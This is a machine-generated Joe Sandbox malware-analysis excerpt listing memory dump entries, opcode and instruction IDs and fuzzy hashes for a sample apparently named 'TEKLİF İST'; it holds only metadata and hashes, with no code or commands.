                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9511c1c2571d32cad6deb682cd6c985b85c7685726209d60d98f353a7f03a430
                                                                                                              • Instruction ID: fa023efa861ff9bb412150e85ebdd89143d03be3186e06fb655240b64b52cee7
                                                                                                              • Opcode Fuzzy Hash: 9511c1c2571d32cad6deb682cd6c985b85c7685726209d60d98f353a7f03a430
                                                                                                              • Instruction Fuzzy Hash: AA218275900129DBCF19DF59C881ABEB7F4FF48740B5000AAF941A7250D774AD51CBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fbcf22fc0b06dae72462b48a561be8b372c0c179394b1d43ee23616ea20bfec3
                                                                                                              • Instruction ID: cf1f25b1bc2fa7ffa82d74f02d1fe045a4632475eabd859355db0c88600ee3c8
                                                                                                              • Opcode Fuzzy Hash: fbcf22fc0b06dae72462b48a561be8b372c0c179394b1d43ee23616ea20bfec3
                                                                                                              • Instruction Fuzzy Hash: 5C217A75600645EBDB19AB6DC980B6AB7A8FF98B40F1400A9F905DB6A0D734ED40CB64
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3706cad0f6f8ed1eff84ae92af5f967cf888022b3b213e312b75dafda20bb456
                                                                                                              • Instruction ID: 06722b9b2dcb2e3eeed0f6d0ffc8fb18529462fb4e5dfa45f51e4efbbdbc2095
                                                                                                              • Opcode Fuzzy Hash: 3706cad0f6f8ed1eff84ae92af5f967cf888022b3b213e312b75dafda20bb456
                                                                                                              • Instruction Fuzzy Hash: 8021B372904346DFD719EF59C884B5BBBECEFE5A40F08049ABD80CB261D734D904C6A1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4c135b65cb8643c7e72e48f2d3040ed2b68554f4f1a3f7f42bffe635216a4553
                                                                                                              • Instruction ID: 380dec279c5fea5c31bb3e6a13f8c1607909ceb6ad1c647db701599c272dc05f
                                                                                                              • Opcode Fuzzy Hash: 4c135b65cb8643c7e72e48f2d3040ed2b68554f4f1a3f7f42bffe635216a4553
                                                                                                              • Instruction Fuzzy Hash: 1C21A731649681ABF72A577C8C44B287BD8EF51B64F1903E4FAA19B6E2D76CD801C250
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c855194ad7887db42b91638bf3c8a272701d86f4195f946be34615d09d49cc7d
                                                                                                              • Instruction ID: 2426310a9ca722b0e448d7937683e3e5cab6f46f010da0990bf33cbe7d1cb947
                                                                                                              • Opcode Fuzzy Hash: c855194ad7887db42b91638bf3c8a272701d86f4195f946be34615d09d49cc7d
                                                                                                              • Instruction Fuzzy Hash: 6F21AC752006119FCB29DF29C841B5677F5FF48744F1884A8A519CBB61E371E842CB94
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d374eb5406f7ecd7215fa32a1363ee55ec601eedd8bf85d2e6e307bee1d5a7b7
                                                                                                              • Instruction ID: f731db1fb08509254c107081aeeae08c5ec0b8363ea791ab609b1309556f75d2
                                                                                                              • Opcode Fuzzy Hash: d374eb5406f7ecd7215fa32a1363ee55ec601eedd8bf85d2e6e307bee1d5a7b7
                                                                                                              • Instruction Fuzzy Hash: E3113A32340B117FDB2E66749C04F27769ADBD4B20F1100ACB70CCB190DB60DC048795
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b81edc0c8a8c7dc924be540f159056e17413b7277b278fe3efce5171010df74f
                                                                                                              • Instruction ID: a6afe35a3a8a66294ffd78db6b8cd8b2e0275c4453c191b67ca4191b4e67ae7e
                                                                                                              • Opcode Fuzzy Hash: b81edc0c8a8c7dc924be540f159056e17413b7277b278fe3efce5171010df74f
                                                                                                              • Instruction Fuzzy Hash: 0621EBB5E00259EBDB14DF9AD881AAEFBF8FF98A00F10016EE405E7250D7709941CF60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                              • Instruction ID: b42788e368143da5639c5918eb1b173bcd23ed62105dd6aa45213d03f857569e
                                                                                                              • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                              • Instruction Fuzzy Hash: 24218E72A0020AEFDF1A9FA9CC40BAEBBB9EF48351F204495F904A7251E774D9509B50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                              • Instruction ID: ca855271ad73cec02365eef0bf53b63d84d7896c2e2043e1d96ce75f9315ce38
                                                                                                              • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                              • Instruction Fuzzy Hash: A5110473600605BFDB2AAF46EC40F9BBBB9EB81754F1000AAF6118B180D7B1ED44CB50
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 990b286c852728ca38e8a6508b4cc333b695c7f53abfe6c309d718a2284a9565
                                                                                                              • Instruction ID: ad74944beb739202789f62a02d5f079944978991c5e2c8bf7ff28dd081df92a9
                                                                                                              • Opcode Fuzzy Hash: 990b286c852728ca38e8a6508b4cc333b695c7f53abfe6c309d718a2284a9565
                                                                                                              • Instruction Fuzzy Hash: AE11A132241241EFDF1AEF19CD80F967BB8FF54B84F2000A5E9059B661C375ED01CA90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 10f02a7386e6d4556b7a1ba1082e0111f432e2d3561a66e0049f6f84a219e9f0
                                                                                                              • Instruction ID: bd8f22d09abff08f8d6009cf0dd749a5189acbc752a571f59f89df637e2cf70c
                                                                                                              • Opcode Fuzzy Hash: 10f02a7386e6d4556b7a1ba1082e0111f432e2d3561a66e0049f6f84a219e9f0
                                                                                                              • Instruction Fuzzy Hash: 41115E71642229ABDF29AB64CD41FE973B4EB04B10F5041D4A314E61E0D7709E81DF84
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                                                              • Instruction ID: 35f406e19cc4f930314db154a9261cf6aaabdf66c4d2c20727e85f7e9c0aedee
                                                                                                              • Opcode Fuzzy Hash: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                                                              • Instruction Fuzzy Hash: 0C014772A046166BFF2D9B29D804BAFBF68DB84B50F1445A9BA065B280D774DD80C3F0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4d4e727fcf0da98f0b44a296489d32d6dbb2fcdeccebab4cbe24613555581b4f
                                                                                                              • Instruction ID: 7cae22f8a7242693453b191d895b1cb6c00d53111668dd6095d6bfc16ce5a89b
                                                                                                              • Opcode Fuzzy Hash: 4d4e727fcf0da98f0b44a296489d32d6dbb2fcdeccebab4cbe24613555581b4f
                                                                                                              • Instruction Fuzzy Hash: F7012471700B02ABDF69AE69D840927B7A4FFD4318B0001BCF94583651DF22EC16C7D0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                              • Instruction ID: da5239b7d6b2e05f4b0f3f1f9258bc79e5bc1503836cdc83d245f5cdd1f3ba4d
                                                                                                              • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                              • Instruction Fuzzy Hash: DE01D2322001008BEF199A1DE880BA27BA6FFD8710F1581E9ED01CF346DB71C881E390
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 892d9ccbc63a16d1c5b67ea159e59f5bb3879e79f43bb5970303a72433162e35
                                                                                                              • Instruction ID: 3dab2778b8a85390098709c3c1d2c57c08755c37b61d9d452f968a8a1744948f
                                                                                                              • Opcode Fuzzy Hash: 892d9ccbc63a16d1c5b67ea159e59f5bb3879e79f43bb5970303a72433162e35
                                                                                                              • Instruction Fuzzy Hash: 8B111772900019ABCF16DB94CC84EDFBB7CEF58354F0441A6A906A7211EB34EA15CBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 72d85c58e1a829225637d2772c0e76ace29b12979a831b89362c4767111f6a43
                                                                                                              • Instruction ID: d245f58669da06ee02c39b00d00bf4079378280f526f237ccb6972198a50ba08
                                                                                                              • Opcode Fuzzy Hash: 72d85c58e1a829225637d2772c0e76ace29b12979a831b89362c4767111f6a43
                                                                                                              • Instruction Fuzzy Hash: FD11C83664414A9FD719CF58D410BA5B7B9FF56318F488199E849CB315E731EC81CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4430239b558f388f7e70e518057eca934eff24f5f410ab9b4406183134acb017
                                                                                                              • Instruction ID: f645d8f06fd741d718d07b69956555fde253bb72b8e1049f22478738c2b02c2b
                                                                                                              • Opcode Fuzzy Hash: 4430239b558f388f7e70e518057eca934eff24f5f410ab9b4406183134acb017
                                                                                                              • Instruction Fuzzy Hash: 6911E8B1A00219ABCB04DFA9D581AAEBBF8FF58750F10406AB905E7351D774EE01CBA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 61daab287df6e46e106857b6c5958a11063265536c8481d0c8d510eec2e6f7e7
                                                                                                              • Instruction ID: e5ed7af6990400f51f38270915e154ce0a8672fe368a20d95efe573f1a09bc98
                                                                                                              • Opcode Fuzzy Hash: 61daab287df6e46e106857b6c5958a11063265536c8481d0c8d510eec2e6f7e7
                                                                                                              • Instruction Fuzzy Hash: 29012431041211DBCB3AAF19C408E36BBF9FF92694F0454EEE6024B210CB30DC41CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a1bb430778e9cebc5594ec1ad23e784ee9bf870f115f7588ef89b170fb24c48e
                                                                                                              • Instruction ID: ba36e153c6e464bfcea4e9b83157445e442b85b65609e3708613916fda2bb18a
                                                                                                              • Opcode Fuzzy Hash: a1bb430778e9cebc5594ec1ad23e784ee9bf870f115f7588ef89b170fb24c48e
                                                                                                              • Instruction Fuzzy Hash: 08116D75A0120DABCF09EFA5C851BAE7BB5EB54B40F104099F90697290EB35EE11CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                              • Instruction ID: 6843eb223f75dd6dcbd700ed131ab91b8eb73da17db7c8a724b34687d839870b
                                                                                                              • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                              • Instruction Fuzzy Hash: B801DD321007459FDF2A96AAC440F67BBE9FFD5250F0445AAA99687550DF74E802C760
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d895d8a1c0b3d2df6967deb639446f270fc0ed362ae85bd37ce201cb499057bf
                                                                                                              • Instruction ID: ce7aa8d8e208de82fe62b4349dbe7907513cea2ed7d5799d113ac0c95aa7f7ec
                                                                                                              • Opcode Fuzzy Hash: d895d8a1c0b3d2df6967deb639446f270fc0ed362ae85bd37ce201cb499057bf
                                                                                                              • Instruction Fuzzy Hash: A201F7B1201601BFC759BB3DCD80F53BBECFF99694B0006A5B60583660DB64EC01C6E0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 13aa93df3481132ef0500b91c00d348f9072c18ca79b0c30500028b95196cf43
                                                                                                              • Instruction ID: 1b8e4180a0c1d119e056e57da1638954151792a30903949396153fafc2fc7918
                                                                                                              • Opcode Fuzzy Hash: 13aa93df3481132ef0500b91c00d348f9072c18ca79b0c30500028b95196cf43
                                                                                                              • Instruction Fuzzy Hash: 0001DD322142169BC72CEF698444AA6BBA8EF58760F114269E95587190F730D905C7D1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: aca0f566dd2dfc8bf2892329f84e5505f1bd60cf05f28a7b98731da2e86081f0
                                                                                                              • Instruction ID: a4431eaa1cbfdc82c5b96ad3cd09e47a048c5a27c5acb8d0c4f365f4a52812a7
                                                                                                              • Opcode Fuzzy Hash: aca0f566dd2dfc8bf2892329f84e5505f1bd60cf05f28a7b98731da2e86081f0
                                                                                                              • Instruction Fuzzy Hash: FE115B75A00209EBDF19EFA8C850EAEBBB5EB58B40F008099FD0597390DB34E911CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fb963bc34b539aa6935d2c8d7582d4bbd72aac4bc91de6818997350746cac9fe
• Instruction ID: b8c5b98a38391660ce7678f467d66729bc42af717eff63e66bfbca7bf93efb34
• Opcode Fuzzy Hash: fb963bc34b539aa6935d2c8d7582d4bbd72aac4bc91de6818997350746cac9fe
• Instruction Fuzzy Hash: 9A113C716183059FC704DF69D441A9BBBE4EF98750F00455EB998D7391E770E901CB92
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
• Instruction ID: 8b9f2b8f401a2f3cd9f4eb5c4d1277dd9e8e47fb2711f9b5dbc16693d8b5a2be
• Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
• Instruction Fuzzy Hash: 3C012433240601DFDB298A6DC841F96BBEAFBC2300F054859E6428B658DBB0F841D7A0
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 80bc3815935339b137427eb141cb3a0d99bc43ce340614928b249fd9dc78865b
• Instruction ID: 30b76aaea228201925219b0ea7fbf34842ddd1b370c9c5e07e8827055354d3c0
• Opcode Fuzzy Hash: 80bc3815935339b137427eb141cb3a0d99bc43ce340614928b249fd9dc78865b
• Instruction Fuzzy Hash: 2A1157B16083099FC704DF69C441A4ABBE8EF99B50F00855EB958D73A4E730E900CB92
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
• Instruction ID: 850ebfc2af020b34ca8732684dfb5bed3a8e99450d6fc09407200c3aebc86a66
• Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
• Instruction Fuzzy Hash: C2017C32204580DFE76A9B1DC988F26BBE8EB48754F0D04E5F905CB6A1D728DD41C625
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ee8d6e9bcfdd5ffe5cebebd1b2829a26c6b2a6dd50e2aff392940e7caffc791d
• Instruction ID: 22720607a4664cec10a5cd025a5f8eca09d1172396b0880f3d47d186adc3f9c7
• Opcode Fuzzy Hash: ee8d6e9bcfdd5ffe5cebebd1b2829a26c6b2a6dd50e2aff392940e7caffc791d
• Instruction Fuzzy Hash: FF018432710505EBDB1CEB6ADC50AAA77A9EFD0A10B1541A9A901A7644DF20DD02C691
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 98748a051f7bd6f3a385a5ea902a4fdf96629728bdbd4a6db2f6a250ef42a8ec
• Instruction ID: 50116d6fee5dc4a21f9ea04b9d21f351f0191d7fabda3a8ab1a361f533f4655b
• Opcode Fuzzy Hash: 98748a051f7bd6f3a385a5ea902a4fdf96629728bdbd4a6db2f6a250ef42a8ec
• Instruction Fuzzy Hash: C3018FB1240601AFDB3A5F29D941B16BAE8EF56B50F1144AAA706DB390D7B4D840CB54
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3e7f9c515ee89ae358340f0f8bf9aef651e02233aafceacaeba550cca222010a
• Instruction ID: 234f8d52d82ad1b243b7f84d8ef97ec8ad2ca8de06220e30377b006e64cb95f0
• Opcode Fuzzy Hash: 3e7f9c515ee89ae358340f0f8bf9aef651e02233aafceacaeba550cca222010a
• Instruction Fuzzy Hash: 4CF0F932641710B7CB399F569C40F17BEADEB84B90F0480A8BA0597610C730ED01EBE0
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
• Instruction ID: fc8d3aa94299c3e9ec9de1bf78744bc8a00930d3a3eb8d293d3f7a1666e8e534
• Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
• Instruction Fuzzy Hash: 54F0C2B2600611ABD339CF4DDC40E67FBEEDBD5A80F048169A545C7220EB31ED05CB90
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
• Instruction ID: 7bfcadeafc0a9e50c146b97dfe639070a9eee24fe941c409e312e2c0b6959d9a
• Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
• Instruction Fuzzy Hash: A9F0FC332446339BDB3A16D94880B2BBE95CFD5A64F1900B7E605BB204CF708D2256D1
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
• Instruction ID: 4ef5696dfb6891c979dbbc737ec7a5517b0f4caa6f3356260a630bbca851e2b5
• Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
• Instruction Fuzzy Hash: B501D631200686AFD72AA71DC885BA9BFDCEF51750F0840E9FA148BAA1D7B8C800C250
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a3ebb15d5dd15a9d68c4c2b09d48f6b420325f8c6d2edb77c335664bd09df9da
• Instruction ID: bf50ae53beccc102dc9e7ee3b5a9f969fd9c3879163205e3777971340a653f4d
• Opcode Fuzzy Hash: a3ebb15d5dd15a9d68c4c2b09d48f6b420325f8c6d2edb77c335664bd09df9da
• Instruction Fuzzy Hash: EB017C71A00259EBCB04DFA9D441BEEBBF8AF58710F14405AE901A7290D774EA01CB94
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
